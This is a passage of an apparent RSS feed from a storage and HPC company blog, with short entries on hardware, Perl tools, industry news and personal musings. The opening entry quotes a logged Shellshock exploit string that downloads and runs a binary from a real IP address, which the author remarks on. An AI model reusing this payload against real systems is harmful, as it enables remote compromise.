()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22  This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that &amp;hellip; I&amp;rsquo;ll wait.</description>
    </item>
    
    <item>
      <title>A completely unsolved problem</title>
      <link>https://blog.scalability.org/2015/03/a-completely-unsolved-problem/</link>
      <pubDate>Mon, 09 Mar 2015 18:08:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/a-completely-unsolved-problem/</guid>
      <description>contact management across multiple devices/OSes/applications. Yeah, I know, just use iCloud/Gmail/etc. Except they are all broken. And not a little bit. I rely upon one, consistent, correct contact list that has email, phone, etc. for all the people I know and communicate with. In years past, I&amp;rsquo;ve had this list sync back and forth to Gmail via google. And it used to work. Then iPhone5 and well, ya know, it broke.</description>
    </item>
    
    <item>
      <title>Scalable Informatics customer Milford Film and Animation does awesome projects</title>
      <link>https://blog.scalability.org/2015/03/scalable-informatics-customer-milford-film-and-animation-does-awesome-projects/</link>
      <pubDate>Fri, 06 Mar 2015 16:43:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/scalable-informatics-customer-milford-film-and-animation-does-awesome-projects/</guid>
      <description>It&amp;rsquo;s nice to hear success stories from our customers. In this case, our friends and customers at Milford Film and Animation have been using our systems for a number of years to provide the basis for their storage efforts. Their workloads are very compute-, network-, and IO-intensive. There is a tremendous amount of rendering, editing, and many other things that require absolutely the highest performance you can get in a dense package.</description>
    </item>
    
    <item>
      <title>My vote for most awesome Mac OSX software</title>
      <link>https://blog.scalability.org/2015/03/my-vote-for-most-awesome-mac-osx-software/</link>
      <pubDate>Wed, 04 Mar 2015 21:09:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/my-vote-for-most-awesome-mac-osx-software/</guid>
      <description>Karabiner If you switch back and forth between Linux and Mac on same keyboard, this is an absolute must have. From my perspective, the keys in Mac are horribly borked. Home and End do not do what I expect. Control-Anything doesn&amp;rsquo;t work except in exceptional cases. iTerm2 (also very good Mac software) largely does the right thing on its own, but the keyboard side of MacOSX is basically borked. This lets you unbork it.</description>
    </item>
    
    <item>
      <title>Memory channel flash:  is it over?</title>
      <link>https://blog.scalability.org/2015/03/memory-channel-flash-is-it-over/</link>
      <pubDate>Wed, 04 Mar 2015 19:45:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/memory-channel-flash-is-it-over/</guid>
      <description>[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I&amp;rsquo;ve got no information that is not public, so I can&amp;rsquo;t disclose something I don&amp;rsquo;t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk, as SanDisk bought Smart Storage, which worked with Diablo prior to the acquisition. Netlist appears to have won an (at least temporary) injunction against Diablo.</description>
    </item>
    
    <item>
      <title>New all-flash-array:  SanDisk&#39;s Infiniflash</title>
      <link>https://blog.scalability.org/2015/03/new-all-flash-array-sandisks-infiniflash/</link>
      <pubDate>Wed, 04 Mar 2015 18:19:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/new-all-flash-array-sandisks-infiniflash/</guid>
      <description>Interesting development from SanDisk. Not quite an M&amp;amp;A bit, but an attempt at accelerating adoption of non-spinning storage by bringing out a proof of concept product in a few flavors. They are aiming at $2/GB for this system. This is an array product though, so you need to attach it to a set of servers. Also, for something this large, the specs are kind of disappointing: 7GB/s maximum and 1M IOPS.</description>
    </item>
    
    <item>
      <title>M&amp;A:  HGST acquires Amplidata</title>
      <link>https://blog.scalability.org/2015/03/ma-hgst-acquires-amplidata/</link>
      <pubDate>Wed, 04 Mar 2015 17:12:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/03/ma-hgst-acquires-amplidata/</guid>
      <description>This is closer to home. Amplidata is an erasure-coded cold storage system atop &amp;ldquo;cheap&amp;rdquo; hardware. HGST, of course, makes storage devices. This continues a trend of vertical integration between folks with systems experience and folks who make the things that go into those systems. If you control more of the stack, you can add more value to your bottom line &amp;hellip; up to a point. The flip side is that you may start competing with your customers.</description>
    </item>
    
    <item>
      <title>M&amp;A Avago (the LSI acquirers) just bought Emulex</title>
      <link>https://blog.scalability.org/2015/02/ma-avago-the-lsi-acquirers-just-bought-emulex/</link>
      <pubDate>Thu, 26 Feb 2015 15:27:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/ma-avago-the-lsi-acquirers-just-bought-emulex/</guid>
      <description>Ok, this is starting to look like someone is buying up the tech behind storage and storage networking on the hardware side. Avago acquired LSI in 2013, and now they&amp;rsquo;ve gone and grabbed Emulex. Emulex has a large FC capability, but I can&amp;rsquo;t imagine that this is the only reason for this buy. They also have converged network adapters, RDMA and offload capability, and other bits. They are an OEM to many large vendors.</description>
    </item>
    
    <item>
      <title>influxdb cli queries now with regex</title>
      <link>https://blog.scalability.org/2015/02/influxdb-cli-queries-now-with-regex/</link>
      <pubDate>Wed, 18 Feb 2015 06:25:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/influxdb-cli-queries-now-with-regex/</guid>
      <description>This is the way queries are supposed to work. Note the Perl regex in the series name:
unison&amp;gt; select * from /^usn-ramboot.nettotals.kb(in|out)$/ limit 10
D[23261] Scalable::TSDB::_generate_url; dbquery = &#39;select * from /^usn-ramboot.nettotals.kb(in|out)$/ limit 10&#39;
D[23261] Scalable::TSDB::_generate_url; query = &#39;p=XXXXXXXX&amp;amp;u=scalable&amp;amp;chunked=1&amp;amp;time_precision=s&amp;amp;q=select%20%2A%20from%20%2F%5Eusn-ramboot.nettotals.kb%28in%7Cout%29%24%2F%20limit%2010&#39;
D[23261] Scalable::TSDB::_generate_url; url = &#39;http://localhost:8086/db/unison/series?p=XXXXXXX&amp;amp;u=scalable&amp;amp;chunked=1&amp;amp;time_precision=s&amp;amp;q=select%20%2A%20from%20%2F%5Eusn-ramboot.nettotals.kb%28in%7Cout%29%24%2F%20limit%2010&#39;
D[23261] Scalable::TSDB::_send_chunked_get_query -&amp;gt; reading 0.009837s
D[23261] Scalable::TSDB::_send_chunked_get_query -&amp;gt; bytes_received = 530B
D[23261] Scalable::TSDB::_send_chunked_get_query return code = 200
D[23261] Scalable::TSDB::_send_chunked_get_query cols = [time,sequence_number,usn-ramboot.nettotals.kbin]
D[23261] Scalable::TSDB::_send_chunked_get_query cols = [time,sequence_number,usn-ramboot.</description>
    </item>
    
    <item>
      <title>InfluxDB cli ready for people to play with</title>
      <link>https://blog.scalability.org/2015/02/influxdb-cli-ready-for-people-to-play-with/</link>
      <pubDate>Wed, 18 Feb 2015 02:22:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/influxdb-cli-ready-for-people-to-play-with/</guid>
      <description>The code is on github. Installation should be simple:
sudo make INSTALLPATH=/path/where/you/want/it
It will install any needed Perl modules for you. I&amp;rsquo;ve reduced the dependency set to LWP::UserAgent, Getopt::Lucid, JSON::PP, and some text processing. As much as I like Mojolicious, its UserAgent was 1/10th the speed of LWP for the same work. Once it is done, point it over to an InfluxDB database instance:
landman@metal:~/work/development/influxdbcli$ ./influxdb-cli.pl --user scalable --pass XXXXXXX --host 192.</description>
    </item>
    
    <item>
      <title>So I finally figured it out</title>
      <link>https://blog.scalability.org/2015/02/so-i-finally-figured-it-out/</link>
      <pubDate>Sat, 14 Feb 2015 19:32:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/so-i-finally-figured-it-out/</guid>
      <description></description>
    </item>
    
    <item>
      <title>love/hate relationship with new hardware</title>
      <link>https://blog.scalability.org/2015/02/lovehate-relationship-with-new-hardware/</link>
      <pubDate>Sat, 14 Feb 2015 04:21:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/lovehate-relationship-with-new-hardware/</guid>
      <description>One of the dangers of dealing with newer hardware is that, often, it doesn&amp;rsquo;t work so well. Or the drivers get hosed in mysterious ways. We&amp;rsquo;ve got some nice shiny new 10GbE cards for a set of Unison systems going into a customer site next week. We had some very odd issues with other 10GbE cards, so we rolled over to newer-design cards. Younger silicon, younger design. Newer kernel module. I can&amp;rsquo;t say I am enjoying this experience thus far.</description>
    </item>
    
    <item>
      <title>Real measurement is hard</title>
      <link>https://blog.scalability.org/2015/02/real-measurement-is-hard/</link>
      <pubDate>Mon, 09 Feb 2015 01:52:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/real-measurement-is-hard/</guid>
      <description>I had hinted at this last week, so I figure I had better finish working on this and get it posted already. The previous bit on the language-choice wakeup call was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I&amp;rsquo;ve done some work in it, but Perl has been my go-to language.</description>
    </item>
    
    <item>
      <title>When the revolution hits in force ...</title>
      <link>https://blog.scalability.org/2015/02/when-the-revolution-hits-in-force/</link>
      <pubDate>Fri, 06 Feb 2015 15:35:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/when-the-revolution-hits-in-force/</guid>
      <description>Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children&amp;rsquo;s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.</description>
    </item>
    
    <item>
      <title>A wake up call about language choices for certain use cases</title>
      <link>https://blog.scalability.org/2015/02/a-wake-up-call-about-language-choices-for-certain-use-cases/</link>
      <pubDate>Thu, 05 Feb 2015 03:20:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/a-wake-up-call-about-language-choices-for-certain-use-cases/</guid>
      <description></description>
    </item>
    
    <item>
      <title>M&amp;A in our space</title>
      <link>https://blog.scalability.org/2015/02/ma-in-our-space/</link>
      <pubDate>Tue, 03 Feb 2015 03:00:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/ma-in-our-space/</guid>
      <description>The day job&amp;rsquo;s products have never been stronger, fit together as well, or had as great a story arc as they do today. We can deliver denser, faster, easier to setup and manage systems quite easily. Our application stacks run atop this system on our ample computing power, and we provide massive network pipes in/out, as data motion is hard. Many more cool things are coming, but for now, we are working very hard on building something awesome.</description>
    </item>
    
    <item>
      <title>Hype at the speed of hype, or big data marketing and media</title>
      <link>https://blog.scalability.org/2015/02/hype-at-the-speed-of-hype-or-big-data-marketing-and-media/</link>
      <pubDate>Sun, 01 Feb 2015 15:32:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/02/hype-at-the-speed-of-hype-or-big-data-marketing-and-media/</guid>
      <description>There was a great post on the marketing of big data by John Foreman on his blog. I found it a very enjoyable read for one &amp;hellip; and it showed that hype is a self-similar phenomenon. No matter what topic it is in, some people will try to generate and exploit the generated hype, regardless of the true information content associated with it. I could shake my head, but I&amp;rsquo;ve seen this, many times over my career.</description>
    </item>
    
    <item>
      <title>Shakes head, chuckles ... yeah, we couldn&#39;t see that one coming ...</title>
      <link>https://blog.scalability.org/2015/01/shakes-head-chuckles-yeah-we-couldnt-see-that-one-coming/</link>
      <pubDate>Tue, 27 Jan 2015 18:54:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/shakes-head-chuckles-yeah-we-couldnt-see-that-one-coming/</guid>
      <description>Just to get this out of the way: apart from this ideologically and politically charged debasement of real science, I am and remain firmly a &amp;ldquo;believer&amp;rdquo;* that the earth&amp;rsquo;s climate has changed, has been changing, and will continue to change with or without our input. Moreover, our climate has gone through some remarkable changes over its existence, all lovingly preserved in one way or another in the fossil record, and through mechanisms that effectively store the state of a system.</description>
    </item>
    
    <item>
      <title>Why doesn&#39;t linkedin make removing a contact easy?</title>
      <link>https://blog.scalability.org/2015/01/why-doesnt-linkedin-make-removing-a-contact-easy/</link>
      <pubDate>Tue, 27 Jan 2015 16:11:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/why-doesnt-linkedin-make-removing-a-contact-easy/</guid>
      <description>I don&amp;rsquo;t get this. Yeah, sure, your contacts are curated, and I don&amp;rsquo;t accept everyone. I need to see some aspect of a connection, and be pretty sure they won&amp;rsquo;t spam me personally or try to spam my contacts. So when I find out that this is what happens, I want to block their access to me. Which usually means un-connecting with them. So why does LinkedIn make this effectively impossible in the phone apps?</description>
    </item>
    
    <item>
      <title>Where have you been all my life FFI::Platypus?</title>
      <link>https://blog.scalability.org/2015/01/where-have-you-been-all-my-life-ffiplatypus/</link>
      <pubDate>Tue, 27 Jan 2015 03:38:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/where-have-you-been-all-my-life-ffiplatypus/</guid>
      <description>Oh my &amp;hellip; this is goodness I&amp;rsquo;ve been badly missing in Perl. I just learned about it this morning. Short version: you want to mix programming languages in the implementation of some project. One language makes development of some subset of functions very easy, while another language handles another part very well. You usually need some sort of layer to handle this, or a way to map sanely between the languages. FFI is the concept behind this &amp;hellip; and while there is no mention of CORBA or XDR/RPC type things, this is the logical follow-on to those (in their time) groundbreaking technologies.</description>
    </item>
    
    <item>
      <title>[Update] debunked ... (was IBM layoffs to hit 25% or so of the company)</title>
      <link>https://blog.scalability.org/2015/01/ibm-layoffs-to-hit-25-or-so-of-the-company/</link>
      <pubDate>Mon, 26 Jan 2015 00:14:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/ibm-layoffs-to-hit-25-or-so-of-the-company/</guid>
      <description>[Update] As I had wondered, and as others suggested to me, this number (25%) was likely a click-bait fabrication. Forbes and others also &amp;ldquo;fell for it.&amp;rdquo; I&amp;rsquo;ll admit I did as well. It was too large to ignore, but it also didn&amp;rsquo;t make sense. Close down mainframe and storage? Seriously? Let&amp;rsquo;s call this what it is: an internet rumor that was busted. Paraphrasing Mark Twain, &amp;ldquo;An internet rumor can travel around the world while the truth is still putting on its shoes.&amp;rdquo;</description>
    </item>
    
    <item>
      <title>Finally, a desktop Linux that just works</title>
      <link>https://blog.scalability.org/2015/01/finally-a-desktop-linux-that-just-works/</link>
      <pubDate>Thu, 22 Jan 2015 01:48:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/finally-a-desktop-linux-that-just-works/</guid>
      <description>I&amp;rsquo;ve been a user of Linux on the desktop, as my primary desktop, for the last 16 years. In that time, I&amp;rsquo;ve had laptops with Windows flavors (95, XP, 2000, 7) and a MacOSX desktop. Before that, the first laptop I bought (while working on my thesis) was a triple-boot job, with DOS, Windows 9x, and OS/2. I used the latter when I was traveling and needed to write; the thesis was written in LaTeX, and I could easily move everything back and forth between that and my Indy at home, and my office Indigo.</description>
    </item>
    
    <item>
      <title>stateless booting</title>
      <link>https://blog.scalability.org/2015/01/stateless-booting/</link>
      <pubDate>Sat, 17 Jan 2015 06:37:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/stateless-booting/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Coraid may be going down</title>
      <link>https://blog.scalability.org/2015/01/coraid-may-be-going-down/</link>
      <pubDate>Fri, 16 Jan 2015 07:26:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/coraid-may-be-going-down/</guid>
      <description>According to The Register. No real differentiation (AoE isn&amp;rsquo;t that good, and the Seagate/Hitachi network drives are going to completely obviate the need for such things). We once used and sold Coraid to a customer. The Linux client side wasn&amp;rsquo;t stable. iSCSI was coming up and was actually quite a bit better. We moved over to it. This was during our build-vs-buy phase. We weren&amp;rsquo;t sure if we could build a better box.</description>
    </item>
    
    <item>
      <title>Anatomy of a #fail ... the internet of broken software stacks</title>
      <link>https://blog.scalability.org/2015/01/anatomy-of-a-fail-the-internet-of-broken-software-stacks/</link>
      <pubDate>Fri, 16 Jan 2015 03:59:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/anatomy-of-a-fail-the-internet-of-broken-software-stacks/</guid>
      <description>So I&amp;rsquo;ve been trying to diagnose a problem with my Android devices draining their batteries very quickly. And at the same time, I&amp;rsquo;ve been trying to understand why the address bar in Thunderbird has taken a very long time to respond. I made the connection earlier today when I noticed the 50k+ contacts in my contact list, of which maybe 2000 were unique. I didn&amp;rsquo;t quite understand it.</description>
    </item>
    
    <item>
      <title>Drivers developed largely out of kernel, and infrequently synced</title>
      <link>https://blog.scalability.org/2015/01/drivers-developed-largely-out-of-kernel-and-infrequently-synced/</link>
      <pubDate>Thu, 15 Jan 2015 19:59:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/drivers-developed-largely-out-of-kernel-and-infrequently-synced/</guid>
      <description>One of the other aspects of what we&amp;rsquo;ve been doing has been forward-porting drivers into newer kernels, fixing the occasional bug, and often rewriting portions to track interface changes. I&amp;rsquo;ve found that subsystem vendors seem to prefer to drop code into the kernel very infrequently; sometimes they sync only once every few years. Which often leaves distro kernels with terribly broken, and often very unstable, device support.</description>
    </item>
    
    <item>
      <title>Parallel building debian kernels ... and why its not working ... and how to make it work</title>
      <link>https://blog.scalability.org/2015/01/parallel-building-debian-kernels-and-why-its-not-working-and-how-to-make-it-work/</link>
      <pubDate>Thu, 15 Jan 2015 17:02:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/parallel-building-debian-kernels-and-why-its-not-working-and-how-to-make-it-work/</guid>
      <description>So we build our own kernels. No great surprise, as we put in our own patches, our own drivers, etc. We have a nice build environment for RPMs and .debs. It works quite well. Same source, same patches, same makefile driving everything. We get shiny new and happy kernels out the back end, ready for regression/performance/stability testing. Works really well. But &amp;hellip; but &amp;hellip; parallel builds (i.e. leveraging more than 1 CPU) work only for the RPM builds.</description>
    </item>
    
    <item>
      <title>Amusing #fail</title>
      <link>https://blog.scalability.org/2015/01/amusing-fail/</link>
      <pubDate>Wed, 14 Jan 2015 16:55:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/amusing-fail/</guid>
      <description>I use Mozilla&amp;rsquo;s Thunderbird mail client. For all its faults, it is still the best cross-platform email client around. Apple&amp;rsquo;s mail client is a bad joke and only runs on Apple devices (go figure). Linux&amp;rsquo;s many offerings are open source and portable, but most don&amp;rsquo;t run well on my Mac laptop. I no longer use Windows apart from running it in a VirtualBox environment. And I would never go back to Outlook anyway (used it once, 15 years ago or so &amp;hellip; never again).</description>
    </item>
    
    <item>
      <title>The Interview (no, not that one!)</title>
      <link>https://blog.scalability.org/2015/01/the-interview-no-not-that-one/</link>
      <pubDate>Wed, 07 Jan 2015 20:58:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/the-interview-no-not-that-one/</guid>
      <description>Rich at InsideHPC.com (you do read it daily, don&amp;rsquo;t you?) just posted our (long) interview from SC14. Have a look at it here (http://insidehpc.com/2015/01/video-scalable-informatics-steps-io-sc14/) . As a reminder, Portable PetaBytes are for sale! And yes, the response has been quite good &amp;hellip; More soon &amp;hellip; And no, we aren&amp;rsquo;t going to hack anyone</description>
    </item>
    
    <item>
      <title>Micro, Meso, and Macro shifts</title>
      <link>https://blog.scalability.org/2015/01/micro-meso-and-macro-shifts/</link>
      <pubDate>Fri, 02 Jan 2015 23:52:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2015/01/micro-meso-and-macro-shifts/</guid>
      <description>The day job lives at a crossroads of sorts. We design, build, sell, and support some of the fastest hyperconverged (aka tightly coupled) storage and computing systems in the market. We&amp;rsquo;ve been talking about this model for more than a decade, and interestingly, the market for this has really taken off over the last 12 months. The idea is very simple. Keep computing, networking, and storage very tightly tied together, and enable applications to leverage the local (and distributed) resources at the best possible speed.</description>
    </item>
    
    <item>
      <title>Friday morning/afternoon code optimization fun</title>
      <link>https://blog.scalability.org/2014/12/friday-morningafternoon-code-optimization-fun/</link>
      <pubDate>Fri, 12 Dec 2014 19:17:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/12/friday-morningafternoon-code-optimization-fun/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Inventory reduction @scalableinfo</title>
      <link>https://blog.scalability.org/2014/12/inventory-reduction-scalableinfo/</link>
      <pubDate>Wed, 10 Dec 2014 18:47:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/12/inventory-reduction-scalableinfo/</guid>
      <description>It&amp;rsquo;s that time of year, when the inventory fairies come out and begin their counting. Math isn&amp;rsquo;t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores
128 GB RAM
48x {2,3,4} TB top mount drives
4x rear mount SSDs (OS/metadata cache)
Scalable OS (Debian Wheezy based Linux OS)
3 year warranty
As this is inventory reduction, the more inventory you take, the happier we are (and the less work the inventory fairies have to do).</description>
    </item>
    
    <item>
      <title>The #PortablePetaByte : Coming to a data center near you!</title>
      <link>https://blog.scalability.org/2014/12/the-portablepetabyte-coming-to-a-data-center-near-you/</link>
      <pubDate>Fri, 05 Dec 2014 21:30:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/12/the-portablepetabyte-coming-to-a-data-center-near-you/</guid>
      <description>As seen at SC14. We have our Portable PetaByte systems available for sale. Half rack to many racks, 1 PB and upwards, 20GB/s and up. Faster with SSDs. See the link above!</description>
    </item>
    
    <item>
      <title>Three years</title>
      <link>https://blog.scalability.org/2014/11/three-years/</link>
      <pubDate>Sun, 30 Nov 2014 14:35:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/three-years/</guid>
      <description>It&amp;rsquo;s been 3 years to the day since I wrote this. As we&amp;rsquo;ve done both before and after this happened, we are going to a TSO concert on the anniversary of the surgery. It&amp;rsquo;s an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways &amp;hellip; I no longer take some things for granted. I try to spend more time with the family, and do more things with them.</description>
    </item>
    
    <item>
      <title>Systemd, and the future of Linux init processing</title>
      <link>https://blog.scalability.org/2014/11/systemd-and-the-future-of-linux-init-processing/</link>
      <pubDate>Sat, 29 Nov 2014 18:28:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/systemd-and-the-future-of-linux-init-processing/</guid>
      <description>An interesting thing has happened over the last few months and years. Systemd, a replacement init process for Linux, gained more adherents, and supplanted the older-style init.d/rc scripting in use by many distributions. Ubuntu famously abandoned init.d-style processing in favor of upstart and others in the past, and has been rolling over to systemd. Red Hat rolled over to systemd. As have a number of others. Including, surprisingly, Debian. For those who don&amp;rsquo;t know what this is, think of it this way.</description>
    </item>
    
    <item>
      <title>Brings a smile to my face</title>
      <link>https://blog.scalability.org/2014/11/brings-a-smile-to-my-face/</link>
      <pubDate>Fri, 28 Nov 2014 05:58:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/brings-a-smile-to-my-face/</guid>
      <description>My soon-to-be 15-year-old daughter was engrossed with something on her laptop yesterday. Thinking it was fan fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. &amp;ldquo;It&amp;rsquo;s Code Combat, Dad,&amp;rdquo; she said, quite matter-of-factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language after she took (and aced) a Java class last year, as Python is inherently simpler.</description>
    </item>
    
    <item>
      <title>Learning to respect my gut feelings again</title>
      <link>https://blog.scalability.org/2014/11/learning-to-respect-my-gut-feelings-again/</link>
      <pubDate>Sun, 23 Nov 2014 17:16:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/learning-to-respect-my-gut-feelings-again/</guid>
      <description>A &amp;ldquo;gut feeling&amp;rdquo; is, at a deep level, a fundamental sense of something that you can&amp;rsquo;t necessarily ascribe metrics to, that you can&amp;rsquo;t quantify exactly. It&amp;rsquo;s not always right. It&amp;rsquo;s a subconscious set of facts, ideas, and concepts that seem to suggest something below the analytical portion of your mind, and it could bias you toward a particular set of directions. Or you could take it as an aberration and go with the &amp;ldquo;facts&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...</title>
      <link>https://blog.scalability.org/2014/11/sc14-day-2-lucerahq-tops-scalableinfo-hardware-with-scalable-info-hardware/</link>
      <pubDate>Wed, 19 Nov 2014 16:57:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/sc14-day-2-lucerahq-tops-scalableinfo-hardware-with-scalable-info-hardware/</guid>
      <description>Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with a newer software stack. Congratulations to Lucera and STAC Research for getting the results out, and to the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics&amp;rsquo; domination of the STAC M3 results. I&amp;rsquo;ll check to be sure, but I believe we are now the hardware side of most of the published records.</description>
    </item>
    
    <item>
      <title>Starting to come around to the idea that swap in any form, is evil</title>
      <link>https://blog.scalability.org/2014/11/starting-to-come-around-to-the-idea-that-swap-in-any-form-is-evil/</link>
      <pubDate>Sun, 16 Nov 2014 17:37:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/starting-to-come-around-to-the-idea-that-swap-in-any-form-is-evil/</guid>
      <description>Here&amp;rsquo;s the basic theory behind swap space. Memory is expensive, disk is cheap. Use the faster memory only for active things, and aggressively swap out the less-used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here&amp;rsquo;s why.
Swap makes the assumption that you can always write to and read from persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well &amp;hellip; Put another way, swap increases your failure likelihood, by involving components with a higher probability of failure in a pathway which assumes no failure.</description>
    </item>
    
    <item>
      <title>#sc14 T-minus 2 days and counting  #HPCmatters</title>
      <link>https://blog.scalability.org/2014/11/sc14-t-minus-2-days-and-counting-hpcmatters/</link>
      <pubDate>Sun, 16 Nov 2014 17:12:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/sc14-t-minus-2-days-and-counting-hpcmatters/</guid>
      <description>On the plane down to NOLA. Going to do booth setup, and then network/machine/demo setup. We&amp;rsquo;ll have a demo visual-fx reel from a customer who uses Scalable Informatics JackRabbit, DeltaV, and (as the result of an upgrade yesterday) Unison. Looking forward to getting everything going, and it will be good to see everyone at the show!</description>
    </item>
    
    <item>
      <title>Gui updates ... oh my ...</title>
      <link>https://blog.scalability.org/2014/11/gui-updates-oh-my/</link>
      <pubDate>Thu, 13 Nov 2014 16:58:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/gui-updates-oh-my/</guid>
      <description></description>
    </item>
    
    <item>
      <title>30TB flash disk, Parallel File System, massive network connectivity</title>
      <link>https://blog.scalability.org/2014/11/30tb-flash-disk-parallel-file-system-massive-network-connectivity/</link>
      <pubDate>Thu, 13 Nov 2014 00:42:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/30tb-flash-disk-parallel-file-system-massive-network-connectivity/</guid>
      <description>This will be fun to watch run &amp;hellip;
Scalable Informatics FastPath Unison for the win!</description>
    </item>
    
    <item>
      <title>SC14 T minus 6 and counting</title>
      <link>https://blog.scalability.org/2014/11/sc14-t-minus-6-and-counting/</link>
      <pubDate>Wed, 12 Nov 2014 23:55:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/sc14-t-minus-6-and-counting/</guid>
      <description>Scalable&amp;rsquo;s booth is #3053. We&amp;rsquo;ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!</description>
    </item>
    
    <item>
      <title>Mixing programming languages for fun and profit</title>
      <link>https://blog.scalability.org/2014/11/mixing-programming-languages-for-fun-and-profit/</link>
      <pubDate>Wed, 12 Nov 2014 21:55:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/11/mixing-programming-languages-for-fun-and-profit/</guid>
      <description>I&amp;rsquo;ve been looking for a simple HTML5-ish way to represent the disk drives in our Unison units, using some simple drawing libraries in javascript to keep things higher level, so I don&amp;rsquo;t have to handle all the low-level HTML5 bits. I played with Raphael and a few others (including paper.js), and wound up implementing something in Raphael.
The code that generated this was a little unwieldy &amp;hellip; as javascript doesn&amp;rsquo;t quite have all the constructs one might expect from a modern language.</description>
    </item>
    
    <item>
      <title>turnkey, low cost and high density 1PB usable at 20&#43; GB/s sustained</title>
      <link>https://blog.scalability.org/2014/10/turnkey-low-cost-and-high-density-1pb-usable-at-20-gbs-sustained/</link>
      <pubDate>Wed, 29 Oct 2014 18:48:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/turnkey-low-cost-and-high-density-1pb-usable-at-20-gbs-sustained/</guid>
      <description>Fully turnkey, we&amp;rsquo;d ship a rack with everything pre-installed/configured. Some de-palletizing required, but it&amp;rsquo;s plug and play (power, disks) after that. More details, and a sign-up to get a formal quote, here. This would be in 24U of rack space for less than $0.18/raw GB or $0.26/usable GB. Single file system name space, a single mount point. Leverages BeeGFS, and we have VMs to provide CIFS/SMB access, as well as NFS access, in addition to the BeeGFS native client.</description>
    </item>
    
    <item>
      <title>Velocity matters</title>
      <link>https://blog.scalability.org/2014/10/velocity-matters/</link>
